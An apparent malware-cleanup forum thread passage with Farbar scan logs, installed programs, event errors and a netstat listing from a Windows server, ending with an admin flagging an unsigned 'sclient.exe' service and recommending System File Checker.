2014-01-26 02:56 - 2014-01-26 02:56 - 00116648 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\GoogleUpdate.exe85b320c7
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed

==================== One Month Modified Files and Folders =======

2014-02-24 09:53 - 2014-02-24 09:53 - 00022993 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-24 09:53 - 2014-02-24 09:41 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-24 09:53 - 2014-02-05 09:53 - 00000000 ____D () C:\FRST
2014-02-24 09:52 - 2014-02-24 09:52 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\FRST-OlderVersion
2014-02-24 09:52 - 2014-02-19 09:35 - 02155520 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-24 09:52 - 2014-01-20 15:13 - 00000936 _____ () C:\Users\administrator.COMPANY\AppData\Local\Temp\chrome_installer.log
2014-02-24 09:52 - 2013-12-04 19:53 - 00000000 ____D () C:\Program Files (x86)\Google
2014-02-24 09:48 - 2013-11-30 11:20 - 01740719 _____ () C:\Windows\WindowsUpdate.log
2014-02-24 09:47 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-02-24 09:47 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-02-24 09:41 - 2013-12-01 10:23 - 00000136 _____ () C:\Windows\system32\config\netlogon.ftl
2014-02-23 13:59 - 2013-12-07 07:20 - 00008582 _____ () C:\Windows\SysWOW64\sclient.log
2014-02-23 13:55 - 2014-02-23 13:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp65.cmd
2014-02-23 13:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-23 13:52 - 2014-02-23 13:52 - 00000034 _____ () C:\Windows\SysWOW64\tmp64.cmd
2014-02-23 13:45 - 2014-02-23 13:45 - 00001352 _____ () C:\Windows\SysWOW64\tmp63.cmd
2014-02-23 13:45 - 2014-02-18 19:44 - 00000000 ____D () C:\Windows\mtc
2014-02-23 13:42 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-23 13:42 - 2014-02-18 19:38 - 00000000 ____D () C:\Windows\ric
2014-02-23 13:38 - 2014-02-23 13:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp61.cmd
2014-02-22 19:34 - 2014-02-22 19:34 - 00000034 _____ () C:\Windows\SysWOW64\tmp57.cmd
2014-02-22 19:21 - 2014-02-22 19:21 - 00001380 _____ () C:\Windows\SysWOW64\tmp54.cmd
2014-02-22 19:04 - 2014-02-22 19:04 - 00000034 _____ () C:\Windows\SysWOW64\tmp50.cmd
2014-02-22 18:50 - 2014-02-22 18:50 - 00001380 _____ () C:\Windows\SysWOW64\tmp47.cmd
2014-02-22 02:12 - 2014-02-22 02:16 - 01150280 _____ (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\F3C0.tmp
2014-02-21 18:14 - 2014-02-21 18:14 - 00000034 _____ () C:\Windows\SysWOW64\tmp43.cmd
2014-02-21 18:00 - 2014-02-21 18:00 - 00001380 _____ () C:\Windows\SysWOW64\tmp40.cmd
2014-02-18 02:29 - 2014-02-07 14:42 - 00000000 ____D () C:\Windows\tanechka_
2014-02-17 17:22 - 2014-02-07 15:04 - 00000000 ____D () C:\Windows\mtc_
2014-02-17 17:18 - 2014-02-07 14:57 - 00000000 ____D () C:\Windows\pts_
2014-02-17 17:14 - 2014-02-15 14:23 - 00000000 ____D () C:\Windows\ric_
2014-02-15 09:21 - 2014-02-07 14:45 - 00000000 ____D () C:\Windows\xpm_
2014-02-14 13:59 - 2014-01-26 19:47 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-11 01:07 - 2014-02-11 01:07 - 00847752 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\goopdate.dll85b32115
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 10:07 - 2013-11-18 09:28 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\administrator.COMPANY\Desktop\TDSSKiller.exe
2014-01-29 14:08 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 10:56 - 2009-07-14 06:10 - 00694294 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-01-29 10:49 - 2013-11-30 11:29 - 25804800 _____ () C:\Windows\system32\vmguest.iso
2014-01-29 10:47 - 2014-01-26 03:01 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-29 10:47 - 2010-11-21 04:47 - 00004430 _____ () C:\Windows\PFRO.log
2014-01-29 10:47 - 2009-07-14 06:06 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:39 - 2014-01-29 09:38 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-29 09:34 - 2014-01-23 11:08 - 00000000 ____D () C:\AdwCleaner
2014-01-29 09:31 - 2014-01-23 12:08 - 00000000 ____D () C:\Program Files\ThreatExpert Memory Scanner
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:52 - 2014-01-20 15:16 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-01-26 19:52 - 2014-01-20 15:15 - 00707672 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:02 - 2009-07-14 04:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-01-26 02:56 - 2014-01-26 02:56 - 00116648 ____T (Google Inc.) C:\Users\administrator.COMPANY\AppData\Local\Temp\GoogleUpdate.exe85b320c7
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:56 - 2013-12-04 19:53 - 00018911 _____ () C:\Users\Administrator\AppData\Local\Temp\chrome_installer.log
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=C:
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
default                 {current}
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows Server 2008 R2
locale                  en-US
inherit                 {bootloadersettings}
recoverysequence        {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
nx                      OptOut
hypervisorlaunchtype    Auto

Windows Boot Loader
-------------------
identifier              {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
device                  ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
systemroot              \windows
nx                      OptIn
winpe                   Yes

Resume from Hibernate
---------------------
identifier              {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=C:
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 Yes

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}

Device options
--------------
identifier              {131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\boot.sdi



LastRegBack: 2014-02-18 15:58

==================== End Of Log ============================

Link to post
Share on other sites

Addition.log:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-02-2014 02
Ran by Administrator at 2014-02-24 09:53:30
Running from C:\Users\administrator.COMPANY\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================


==================== Installed Programs ======================

7-Zip 9.20 (HKLM-x32\...\{23170F69-40C1-2701-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Active Directory Management Pack Helper Object (HKLM\...\{3696BAB3-3B1B-42C3-8D46-1898E59E7C84}) (Version: 1.1.0 - Microsoft Corporation)
ATI Display Driver (HKLM\...\ATI Display Driver) (Version: 8.24.50.5-090623a-083726C-HP - )
Headless Server Registry Update (HKLM-x32\...\{4E5563B6-DE0A-4F3B-A5D6-15789FD12D9B}) (Version: 1.0.0.0 - Hewlett-Packard Company)
HP Array Configuration Utility (HKLM-x32\...\{74C48700-A6A7-4B3D-BD3A-C4E131CDD8E8}) (Version: 8.50.5.0 - Hewlett Packard Development Company, L.P.)
HP Array Configuration Utility CLI (HKLM-x32\...\{14A5045C-33EE-4596-AA69-8761611AE8EB}) (Version: 8.50.6.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Diagnostics  Online Edition for Windows (HKLM\...\{DCEA910B-3269-4F5B-A915-D59293004751}) (Version: 8.5.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Management Agents (HKLM\...\{B7B52204-2CC8-477A-9C7A-382C31070A62}) (Version: 8.50.0.0 - Hewlett-Packard Company)
HP Lights-Out Online Configuration Utility (HKLM\...\{2E97856A-345A-475D-913C-B8A78406BDF6}) (Version: 3.1.0.0 - Hewlett-Packard Development Company, L.P.)
HP ProLiant Integrated Management Log Viewer (HKLM\...\{CF222EB4-4EF7-40F4-A62B-A03E214C20DE}) (Version: 5.24.0.0 - Hewlett-Packard Company)
HP ProLiant PCI-express Power Management Update for Windows (HKLM-x32\...\{34D6E797-AA32-455D-8E65-4EBD1AC9DED7}) (Version: 1.3.0.0 - Hewlett-Packard Company)
HP ProLiant Remote Monitor Service (HKLM\...\{74D49383-7EF9-4FD3-B5B0-73CA22F51CE8}) (Version: 5.21.0.0 - Hewlett-Packard Company)
HP Smart Array SAS/SATA Event Notification Service (HKLM\...\{0F27A9B5-63FD-43DB-8230-FFE1E9CFE2C4}) (Version: 6.20.0.64 - Hewlett-Packard Development Company, L.P.)
HP System Management Homepage (HKLM-x32\...\{3C4DF0FD-95CF-4F7B-A816-97CEF616948F}) (Version: 6.1.0 - Hewlett-Packard Company)
HP Version Control Agent (HKLM-x32\...\{5A5F45AE-0250-4C34-9D89-F10BDDEE665F}) (Version: 6.1.0.842 - Hewlett Packard Development Company, L.P.)
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft Antimalware (Version: 3.0.8107.0 - Microsoft Corporation) Hidden
Microsoft Forefront Endpoint Protection 2010 (HKLM\...\Microsoft Security Client) (Version: 2.0.657.0 - Microsoft Corporation)
Microsoft Forefront Endpoint Protection 2010 Server Management (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
PFA Server Registry Update (HKLM-x32\...\{173438F5-BD4D-47AE-9C8F-73E6BAA62624}) (Version: 1.0.0.0 - Hewlett-Packard Company)
System Center 2012 - Operations Manager Gateway (HKLM\...\{80C2A57A-4193-4800-AA27-CD79553FE9DF}) (Version: 7.0.9538.0 - Microsoft Corporation)
ThreatExpert Memory Scanner 1.0 (HKLM\...\ThreatExpert Memory Scanner_is1) (Version: 1.0.1.0 - Threat Expert Ltd.)

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

2009-07-14 03:34 - 2013-12-03 19:46 - 00000862 ____A C:\Windows\system32\Drivers\etc\hosts
188.122.70.10         scom01.asapnet.local

==================== Scheduled Tasks (whitelisted) =============

Task: {63EE8552-A444-4BA2-8E1E-C8350D6D412A} - System32\Tasks\Microsoft\Windows\Server Manager\ServerManager => C:\Windows\system32\ServerManagerLauncher.exe [2009-07-14] (Microsoft Corporation)
Task: {69110D7B-41DC-4E9D-BDD3-C826C7DB613B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleUsageCollector => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: {815E046D-8DB5-440B-84D3-FDCA723411E6} - System32\Tasks\Microsoft\Windows\Backup\Microsoft-Windows-WindowsBackup => C:\Windows\System32\wbadmin.exe [2009-07-14] (Microsoft Corporation)
Task: {AFECE848-8DA2-461B-B5E6-CBEF57A4DF7D} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleCollector => C:\Windows\system32\ceiprole.exe [2010-11-21] (Microsoft Corporation)
Task: {D49A10DA-0F70-4779-BD96-B2D976A4F2E3} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerCeipAssistant => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)

==================== Loaded Modules (whitelisted) =============

2009-06-25 15:54 - 2009-06-25 15:54 - 00027136 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\XalanMessages_1_10.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 00255488 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\SSLEAY32.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 01362944 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\LIBEAY32.dll
2010-04-28 16:37 - 2010-04-28 16:37 - 00048128 _____ () C:\Windows\system32\CpqNiMgt\CPQNIMIB.DLL
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\cpqnimgt\w2kmgdll.dll
2010-04-28 16:33 - 2010-04-28 16:33 - 00018432 _____ () C:\Windows\system32\cpqnimgt\cqnisnmp.dll
2010-04-28 16:37 - 2010-04-28 16:37 - 00025088 _____ () C:\Windows\system32\CpqNiMgt\NICMIB.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00193024 _____ () C:\Windows\system32\CpqMgmt\Cqmgstor\stormib.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\cqstrutl.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00007168 _____ () C:\Windows\system32\cpqmgmt\cqmgstor\storsnmp.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00027648 _____ () C:\Windows\system32\CpqMgmt\CqmgStor\iscsimib.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\bin\libxml2.dll
2013-11-30 11:20 - 2009-03-09 18:08 - 00072704 _____ () C:\hp\hpsmh\bin\zlib1.dll
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\CPQNiMgt\w2kmgdll.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00032768 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CQMGSTOR.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00043008 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQIDE.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00041472 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMDISK.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00057856 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMSCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00091136 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMIDA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00115200 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQFCA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQISCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\STORALRT.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQSAS.DLL
2013-11-30 11:20 - 2010-01-28 11:10 - 01411584 _____ () C:\hp\hpsmh\bin\LIBEAY32.dll
2013-11-30 11:20 - 2010-01-28 11:04 - 00266240 _____ () C:\hp\hpsmh\bin\SSLEAY32.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\modules\libxml2.dll

==================== Alternate Data Streams (whitelisted) =========


==================== Safe Mode (whitelisted) ===================


==================== Disabled items from MSCONFIG ==============


==================== Faulty Device Manager Devices =============

Name: HP NC326i PCIe Dual Port Gigabit Server Adapter #2
Description: HP NC326i PCIe Dual Port Gigabit Server Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard Company
Service: q57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/24/2014 08:54:13 AM) (Source: Application Error) (User: )
Description: Faulting application name: sclient.exe, version: 0.0.0.0, time stamp: 0x519b9b1f
Faulting module name: sclient.exe, version: 0.0.0.0, time stamp: 0x519b9b1f
Exception code: 0x40000015
Fault offset: 0x00017a8d
Faulting process id: 0x654
Faulting application start time: 0xsclient.exe0
Faulting application path: sclient.exe1
Faulting module path: sclient.exe2
Report Id: sclient.exe3

Error: (02/24/2014 03:55:32 AM) (Source: Application Error) (User: )
Description: Faulting application name: rotatelogs.exe, version: 6.1.0.102, time stamp: 0x4b6122e1
Faulting module name: rotatelogs.exe, version: 6.1.0.102, time stamp: 0x4b6122e1
Exception code: 0xc00000fd
Fault offset: 0x00000000000092f7
Faulting process id: 0x1490
Faulting application start time: 0xrotatelogs.exe0
Faulting application path: rotatelogs.exe1
Faulting module path: rotatelogs.exe2
Report Id: rotatelogs.exe3

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-23T20:00:22.342310200Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/23/2014 01:38:29 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:24:05 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:16:49 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:16:07 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:07:34 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 00:53:49 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.


System errors:
=============
Error: (02/24/2014 09:42:11 AM) (Source: DCOM) (User: )
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (02/24/2014 09:41:41 AM) (Source: Service Control Manager) (User: )
Description: The Windows Modules Installer service terminated with the following error:
%%1450

Error: (02/24/2014 09:41:35 AM) (Source: UmrdpService) (User: )
Description: Driver Send to Microsoft OneNote 15 Driver required for printer Send To OneNote 2013 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:34 AM) (Source: UmrdpService) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:32 AM) (Source: UmrdpService) (User: )
Description: Driver Canon iR C2880/C3380 Class Driver required for printer iR C3380 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:31 AM) (Source: UmrdpService) (User: )
Description: Driver PDFCreator required for printer PDFCreator is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:29 AM) (Source: UmrdpService) (User: )
Description: Driver TOSHIBA Universal Printer 2 required for printer !!olamserver.olam.local!TOSHIBA eSTUDIO 2550 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:28 AM) (Source: UmrdpService) (User: )
Description: Driver Canon LBP6750/3560 Class Driver required for printer Canon-506 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 08:54:26 AM) (Source: Service Control Manager) (User: )
Description: The Network.Tcp Port Sharing Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (02/24/2014 02:52:49 AM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.464.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608


Microsoft Office Sessions:
=========================
Error: (02/24/2014 08:54:13 AM) (Source: Application Error)(User: )
Description: sclient.exe0.0.0.0519b9b1fsclient.exe0.0.0.0519b9b1f4000001500017a8d65401cf1cd71d17c19cC:\Windows\system32\sclient.exeC:\Windows\system32\sclient.exed9862dec-9d28-11e3-906f-18a9053c1a8a

Error: (02/24/2014 03:55:32 AM) (Source: Application Error)(User: )
Description: rotatelogs.exe6.1.0.1024b6122e1rotatelogs.exe6.1.0.1024b6122e1c00000fd00000000000092f7149001cf310be11aea06C:\hp\hpsmh\bin\rotatelogs.exeC:\hp\hpsmh\bin\rotatelogs.exe1fcaeba2-9cff-11e3-906f-18a9053c1a8a

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-23T20:00:22.342310200Z2155348061%%2155348061

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/23/2014 01:38:29 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:24:05 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:16:49 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:16:07 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:07:34 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 00:53:49 AM) (Source: Winlogon)(User: )
Description:


==================== Memory info ===========================

Percentage of memory in use: 81%
Total physical RAM: 14325.74 MB
Available physical RAM: 2611.72 MB
Total Pagefile: 47055.14 MB
Available Pagefile: 34636.35 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:60 GB) (Free:13.93 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (Hyper-V) (Fixed) (Total:486.8 GB) (Free:145.4 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 547 GB) (Disk ID: 9C84BF43)
Partition 1: (Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=487 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Link to post
Share on other sites

Netstat:

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.10.2:3389      213.126.21.66:35578    ESTABLISHED     3636
  TermService
 [svchost.exe]
  TCP    192.168.10.2:5723      192.168.10.11:61761    ESTABLISHED     1404
 [HealthService.exe]
  TCP    192.168.10.2:5723      192.168.10.12:24429    TIME_WAIT       0
  TCP    192.168.10.2:5723      192.168.10.12:24431    TIME_WAIT       0
  TCP    192.168.10.2:5723      192.168.10.12:49005    ESTABLISHED     1404
 [HealthService.exe]
  TCP    192.168.10.2:57030     188.122.70.10:5723     ESTABLISHED     1404
 [HealthService.exe]
  TCP    192.168.10.2:57264     173.194.67.113:443     TIME_WAIT       0

Link to post
Share on other sites

  • Root Admin

What is this software?  It has no company name and is loaded when the computer starts.
Unless you're certain of what it is I would stop it from running.  

S2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()


This could be due to something you've emplemented to lock down the computer but could also be due to damage on the system.

Could not list Restore Points. Check "winmgmt" service or repair WMI.


Please review the following link and run the SFC utility on the system.
Using System File Checker (SFC) To Fix Issues
 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.